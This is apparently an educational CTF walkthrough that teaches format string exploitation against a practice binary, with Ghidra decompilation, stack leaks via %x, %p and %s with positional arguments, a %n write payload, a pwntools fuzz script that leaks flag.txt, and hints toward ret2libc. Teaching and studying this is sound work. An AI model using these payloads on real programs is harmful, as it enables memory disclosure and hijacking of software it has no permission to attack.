description
08/26/2023

🥵 Format String Vulnerabilities

Introduction

What will we be learning?

We will learn how to identify and exploit format string vulnerabilities in programs in order to leak addresses and other data off the stack.

Great Reference

{% embed url="https://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html" %}

GitHub

{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/07-format_string_vulns" %} Grab the target binary here and other files {% endembed %}

Awesome PDF (check this out)

{% file src="../.gitbook/assets/Format_String.pdf" %}

Video Tutorial

{% embed url="https://www.youtube.com/watch?v=iwNYoDw1hW4" %} The all mighty CryptoCat {% endembed %}

Set Proper File Permissions

sudo chown root:root format_vuln
sudo chmod 4655 format_vuln  # the leading 4 sets the setuid bit (the sticky bit would be a leading 1)
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
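
To double-check what a numeric mode means before applying it, Python's standard `stat` module can render it the way `ls -l` would. This is a small sketch that is not part of the original walkthrough; the helper name `describe` is made up for illustration. It shows that the leading 4 in 4655 is the setuid bit rather than the sticky bit.

```python
import stat

def describe(mode: int) -> str:
    """Render permission bits for a regular file the way `ls -l` does."""
    return stat.filemode(stat.S_IFREG | mode)

print(describe(0o4655))  # mode used for format_vuln
print(describe(0o600))   # mode used for flag.txt

# Which special bit does the leading 4 correspond to?
print("setuid:", bool(0o4655 & stat.S_ISUID))
print("sticky:", bool(0o4655 & stat.S_ISVTX))
```

The capital `S` in the owner column means setuid is set while the owner's execute bit is not.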

Enumeration

file:

{% code overflow="wrap" %}

format_vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=c6e50d7e3fe3796407a1827f21d01f343dbaf3fa, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • 32-bit
  • Dynamically linked to libc library
  • Not stripped

checksec:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
  • NX Enabled

"Messing around with the program"

Get into the habit of simply running the binary and asking yourself: "What is the program doing? What is its purpose? What conditions does it require?"

Questions like these build situational awareness and make it easier to follow what is happening on the stack when you read the assembly or the decompilation.

Okay, we can see that the program is likely using printf() to echo the input we send on STDIN.

Also, notice that we cannot overflow the buffer. Is fgets() being used to limit the read to the size of the buffer?

It also appears that we are in some type of loop.

Reversing

I know that the video highlights source code analysis, but more often than not we have only the binary and no source code.

Load up the binary in Ghidra.

Decompilation of main(), after renaming variables and converting constants:

void main(void)

{
  char buffer_1 [64];
  char buffer_2 [64];
  FILE *local_1c;
  __gid_t local_18;
  char *local_14;
  undefined *puStack_10;
  
  puStack_10 = &stack0x00000004;
  setvbuf(_stdout,(char *)0x0,2,0);
  local_14 = buffer_1;
  local_18 = getegid();
  setresgid(local_18,local_18,local_18);
  puts("We will evaluate any format string you give us with printf().");
  local_1c = fopen("flag.txt","r");
  if (local_1c == (FILE *)0x0) {
     puts("flag.txt is missing!");
                         /* WARNING: Subroutine does not return */
     exit(0);
  }
  fgets(buffer_1,64,local_1c);
  do {
     printf("> ");
     fgets(buffer_2,64,_stdin);
     printf(buffer_2);
  } while( true );
}

Ghidra originally shows the size argument of fgets() as 0x40. Converting it to decimal gives 64, which matches the size of our buffers.

With the buffer variables renamed for readability, we can note the following:

  • Both buffers are 64 bytes
    • local_14 is a pointer (char *) that is set to the address of buffer_1
  • fopen() opens flag.txt with the "r" (read) mode and returns a FILE * stream, stored in local_1c
  • The flag is read with fgets() rather than gets(). fgets() is bounded by its size argument: it stores at most 63 bytes plus a terminating null byte, so it cannot write past the 64-byte buffer_1
  • printf("> ") then displays a prompt, so the program behaves like a console
  • The second fgets() reads our input from _stdin into buffer_2
  • That call is also limited to 64 bytes, the size of buffer_2, so there is no buffer overflow here
  • Lastly, we see printf(buffer_2), which is where our vulnerability can be found
  • The do/while(true) loop never exits, so we can send as many inputs as we like
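
To see why the bounded read prevents an overflow, here is a rough Python model of what `fgets(buf, 64, stream)` does. It is only a sketch: `fgets_like` is a hypothetical helper, and the real function also appends a null byte to the buffer. Note that input beyond the limit is not lost; it is picked up by the next call, which in this program means the next loop iteration.

```python
import io

def fgets_like(size: int, stream: io.BytesIO) -> bytes:
    """Model C's fgets(buf, size, stream): read at most size - 1 bytes,
    stopping after the first newline. C would then append a NUL byte."""
    out = bytearray()
    while len(out) < size - 1:
        ch = stream.read(1)
        if not ch:          # end of input
            break
        out += ch
        if ch == b"\n":     # fgets keeps the newline and stops
            break
    return bytes(out)

# 200 A's: far more than the 64-byte buffer could hold
stdin = io.BytesIO(b"A" * 200 + b"\n")
first = fgets_like(64, stdin)
second = fgets_like(64, stdin)
print(len(first), len(second))
```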

Vulnerability

The second printf() call, printf(buffer_2), is where the vulnerability lies.

You might be asking yourself why the first printf() call is not vulnerable, since it takes no extra arguments either. The difference is that its format string, "> ", is a constant chosen by the developer. The second printf() uses buffer_2 as its format string, and buffer_2 is filled from STDIN by fgets(). This means that we fully control the format string, including any format specifiers in it.

Anytime you print input from the user, you MUST pass it as an argument to a fixed format string that states which type of data you expect, for example printf("%s", buffer_2).

If user input is passed as the format string itself, the result is a Format String Vulnerability.

In other words, if the developer does NOT supply the format string, the attacker can supply one for the printf() call.
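
When source or decompiled code is available, this pattern can be searched for mechanically. The following is a minimal sketch, not a real static analyzer: the regular expression and the helper `find_risky_printf` are illustrative assumptions, and they only catch the simplest case, where printf() is called with a single variable as its only argument.

```python
import re

# Matches printf(identifier): the only argument is a variable,
# so the format string is not a string literal.
RISKY_PRINTF = re.compile(r"\bprintf\s*\(\s*([A-Za-z_]\w*)\s*\)")

def find_risky_printf(source: str) -> list[tuple[int, str]]:
    """Return (line_number, variable) for each printf(var) call."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in RISKY_PRINTF.finditer(line):
            hits.append((lineno, match.group(1)))
    return hits

# Lines taken from the decompilation, plus a safe variant for comparison
snippet = '''printf("> ");
fgets(buffer_2,64,_stdin);
printf(buffer_2);
printf("%s", buffer_2);'''

print(find_risky_printf(snippet))
```

Only the third line is reported: the first call uses a literal format string, and the fourth passes the buffer as data to a fixed "%s" format.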

Check out this diagram to view what format specifiers look like in C:

| Format Specifier | Type |
| --- | --- |
| %c | Character |
| %d | Signed integer |
| %e or %E | Scientific notation of floats |
| %f | Float values |
| %g or %G | Shorter of %e/%E or %f |
| %hi | Signed integer (short) |
| %hu | Unsigned integer (short) |
| %i | Signed integer |
| %ld or %li | Long |
| %lf | Double |
| %Lf | Long double |
| %lu | Unsigned long |
| %lli or %lld | Long long |
| %llu | Unsigned long long |
| %o | Octal representation |
| %p | Pointer |
| %s | String |
| %u | Unsigned int |
| %x or %X | Hexadecimal representation |
| %n | Prints nothing; stores the number of characters written so far through an int * argument |
| %% | Prints % character |

Leaking Values off the Stack

Resources

{% embed url="https://vickieli.dev/binary%20exploitation/format-string-vulnerabilities/" %} This guide is OP {% endembed %}

Keep in mind that we can literally print anything from the stack and even data not located on the stack with this vulnerability.

This includes:

  • Global Offset Table (GOT)
  • Anything else

Manual Method

So, with the Format String Vulnerability identified, since the attacker can supply their own format specifier, let's do so:

  1. We sent %p and were able to return pointers.
  2. We sent %x and were able to return hex values.
  3. We sent %c and were able to return char values.

If we tried to print the values as strings with the %s specifier, we would most likely hit a segmentation fault.

Why is that?

%s does not print the stack value itself. It treats the value as a pointer (char *) and prints the bytes stored at that address. If the value is not a valid address within the program's memory, the read fails and the program crashes with a segmentation fault.

In other words, %s takes its argument by reference, while %x and %p print the argument by value.

This also means that we can read from any address we can get onto the stack, even if the data itself is not located on the stack.

This all stems from the fact that we fully control the format string.
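
The difference between printing a value and dereferencing it can be sketched with a toy model. Everything here is made up for illustration: the addresses, the stack words, and the helpers `as_hex` and `as_string` do not come from the target binary.

```python
# Hypothetical memory layout: addresses and contents are invented.
MEMORY = {0x0804A000: b"hello\x00"}            # one mapped C string
STACK = [0x0804A000, 0x67616C66, 0x00000001]   # words printf reads as arguments

def as_hex(word: int) -> str:
    """%x: print the stack word itself."""
    return format(word, "x")

def as_string(word: int) -> str:
    """%s: treat the stack word as a char* and read the bytes it points to."""
    if word not in MEMORY:
        raise MemoryError(f"segfault: 0x{word:08x} is not mapped")
    return MEMORY[word].split(b"\x00")[0].decode()

for word in STACK:
    try:
        print(as_hex(word), "->", as_string(word))
    except MemoryError as err:
        print(as_hex(word), "->", err)
```

Only the first word happens to be a valid pointer, so it is the only one that %s could print safely in this model.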

What is the data in these values?

We can use unhex to convert these values because they are all hex values!

unhex 67616c66
galf

Interesting, that's flag backwards. The bytes appear reversed because x86 is little-endian: the least significant byte of each 32-bit value is stored first in memory.
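
The same conversion can be done in Python, which also makes the byte order explicit. This is a small sketch using only the standard library; `decode_word` is a hypothetical helper name.

```python
import struct

def decode_word(hex_word: str) -> bytes:
    """Turn one leaked 32-bit value (as printed by %x) back into memory order."""
    value = int(hex_word, 16)
    return struct.pack("<I", value)  # "<I" = little-endian unsigned 32-bit

shown = bytes.fromhex("67616c66")   # bytes in the order printf displayed them
stored = decode_word("67616c66")    # bytes in the order they sit in memory
print(shown, stored)
```

Going through `int()` first also copes with values where %x dropped leading zeros.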

I wonder if we can find our flag in memory by leaking values from the stack 🤔.

Side note (and a quick laugh)

A typo led me to discover that %m, a glibc extension, prints the error message for the current value of errno (the same text that strerror(errno) returns):

Result

Explanation

Positional Arguments with printf()

Notice that 67616c66 was the fifth element printed.

If we use printf()'s positional arguments, we can print that exact value:

%5$x
67616c66

%5$p
0x67616c66

Interesting. Let's see if we can print out the entire flag from this leak.
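
One way to approach this is to request several consecutive positions at once and stitch the words back together. The sketch below assumes the flag starts at position 5 (as observed above) and spans four words; the word count, the placeholder flag, and both helper names are assumptions for illustration. The "leak" is simulated locally rather than captured from the binary.

```python
import struct

def build_payload(start: int, count: int) -> str:
    """Build a format string that prints `count` stack words starting at `start`."""
    return ".".join(f"%{i}$x" for i in range(start, start + count))

def decode_leak(leak: str) -> bytes:
    """Reassemble dot-separated %x output into the bytes stored in memory."""
    words = [int(w, 16) for w in leak.strip().split(".")]
    data = b"".join(struct.pack("<I", w) for w in words)
    return data.split(b"\x00")[0]  # stop at the C string terminator

# Placeholder flag, used only to simulate what printf would print.
fake_flag = b"flag{example}\x00\x00\x00"
simulated = ".".join(f"{w:x}" for w in struct.unpack("<4I", fake_flag))

payload = build_payload(5, 4)
print(payload)
print(simulated)
print(decode_leak(simulated))
```

Keep the payload under the 63 characters that fgets() will accept; a longer range has to be split across several prompts.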

Overwriting Memory at any Location

In printf(), the %n specifier stores the number of characters written so far into the int that the corresponding argument points to.

Remember, we FULLY control the format string.

This means that we can write integers of our choosing to the location pointed to by a function argument.

For example, the following code will store the integer 5 into the variable num_char.

int num_char; 
printf("11111%n", &num_char);
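
The value that %n stores is simply printf()'s running character count, and a field width such as %100c lets us raise that count without typing 100 characters. The following toy model illustrates the arithmetic; it is an assumption-laden sketch that understands only literal text and %<width>c, not a reimplementation of printf().

```python
import re

def count_before_n(fmt: str) -> int:
    """Count the characters printf would have written when it reaches %n.
    Toy model: only literal text and %<width>c are understood."""
    head = fmt.split("%n", 1)[0]
    written = 0
    pos = 0
    for match in re.finditer(r"%(\d*)c", head):
        written += match.start() - pos                  # literal characters
        written += max(1, int(match.group(1) or 1))     # %c prints at least 1 char
        pos = match.end()
    return written + len(head) - pos                    # trailing literal text

for fmt in ("11111%n", "%100c%n", "AAAA%60c%n"):
    print(fmt, "->", count_before_n(fmt))
```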

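In a format string attack, the pointer that %n writes through can be a value we placed on the stack ourselves, because our input buffer also lives on the stack. That is what turns a format string vulnerability into a way to write data.

First, find where our input sits among printf()'s arguments by sending a recognizable marker followed by a positional %p:

AAAA%10$p

If the tenth argument is the start of our buffer, the output ends in 0x41414141 (the four A's). Replacing AAAA with a target address and %p with %n would then write the number of characters printed so far (4) to that address.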
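
The two payloads involved can be sketched as follows: a probe that reads with %p to locate our input, and a write that swaps in a packed address and %n. Both the offset and the address are placeholders that have not been measured from format_vuln, and the helper names are hypothetical.

```python
import struct

def probe_payload(offset: int) -> bytes:
    """Marker plus %p: prints the stack word at `offset` so we can look for 0x41414141."""
    return b"AAAA" + f"%{offset}$p".encode()

def write_payload(address: int, offset: int) -> bytes:
    """Packed 32-bit address plus %n: stores the count written so far (4) at `address`."""
    return struct.pack("<I", address) + f"%{offset}$n".encode()

# Both values below are placeholders, not measured from format_vuln.
HYPOTHETICAL_ADDRESS = 0x0804C010
HYPOTHETICAL_OFFSET = 10

print(probe_payload(HYPOTHETICAL_OFFSET))
print(write_payload(HYPOTHETICAL_ADDRESS, HYPOTHETICAL_OFFSET))
```

An address containing a null byte would end the format string early, and one containing a newline byte would end the fgets() read, so such targets need a different layout.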

Automating Format String Vulns w/ pwntools

{% embed url="https://docs.pwntools.com/en/stable/fmtstr.html" %}

fuzz.py:

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./format_vuln', checksec=False)

# Let's fuzz positions 1-99 (positional arguments start at 1)
for i in range(1, 100):
    # Create process (level used to reduce noise)
    p = process(level='error')
    try:
        # When we see the user prompt '>', send the positional specifier
        # e.g. %2$s will attempt to print the second value as a string
        p.sendlineafter(b'> ', '%{}$s'.format(i).encode())
        # Receive the response up to the next prompt
        result = p.recvuntil(b'> ')
        # Check for flag
        # if b'flag' in result.lower():
        print(str(i) + ': ' + str(result))
    except EOFError:
        # The process crashed, e.g. %s dereferenced an invalid pointer
        pass
    finally:
        # Always clean up the process, even after a crash
        p.close()

Result:

We are able to see the contents of flag.txt in the 39th element
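
Rather than reading through the whole output by eye, the collected responses can be filtered for the flag marker, which is what the commented-out check in fuzz.py hints at. This is a minimal sketch: `find_flag` is a hypothetical helper, and the dictionary holds simulated placeholder responses, not real program output.

```python
def find_flag(results: dict[int, bytes], marker: bytes = b"flag") -> list[int]:
    """Return the positions whose leaked output contains `marker` (case-insensitive)."""
    return [i for i, out in sorted(results.items()) if marker in out.lower()]

# Simulated fuzz output; the values are placeholders, not real program output.
simulated = {
    1: b"(null)\n> ",
    2: b"\x01\x02\n> ",
    39: b"flag{example}\n> ",
}
print(find_flag(simulated))
```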

Quick Note for 64-bit Binaries

Be sure to print with %p rather than %x so that you get the full 8-byte value! %x only prints 4 bytes.
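
The loss is easy to see with a little arithmetic. In this sketch the pointer is a made-up 64-bit value; the mask stands in for %x reading only a 32-bit unsigned int.

```python
# Hypothetical 64-bit pointer, chosen only to illustrate the truncation.
pointer = 0x00007FFFF7E15A90

as_x = format(pointer & 0xFFFFFFFF, "x")  # %x reads an unsigned int (32 bits)
as_p = hex(pointer)                        # %p prints the whole pointer

print(as_x)
print(as_p)
```

The upper bytes are missing from the %x result, so the leaked address would be unusable. %lx is another way to get the full value.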

If a leaked address points to a libc function, we can subtract that function's offset within libc to get the libc base address, which lets us perform ret2libc!
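
The base calculation is a single subtraction, followed by a sanity check that the result is page-aligned. All numbers in this sketch are placeholders: the leaked address and both offsets are invented, and the real offsets must come from the exact libc the target uses. Choosing puts and system as the symbols is also just an assumption for the example.

```python
PAGE_SIZE = 0x1000

def libc_base(leaked_address: int, symbol_offset: int) -> int:
    """Base = runtime address of a libc symbol minus that symbol's offset in libc."""
    base = leaked_address - symbol_offset
    if base % PAGE_SIZE != 0:
        raise ValueError("base is not page-aligned; wrong symbol or libc version?")
    return base

# Placeholder numbers: take the real offsets from the target's own libc.
leaked_puts = 0xF7E3A460
puts_offset = 0x0006F460
system_offset = 0x00045830

base = libc_base(leaked_puts, puts_offset)
system_address = base + system_offset
print(hex(base), hex(system_address))
```

If the alignment check fails, the leaked value probably does not belong to the symbol you assumed.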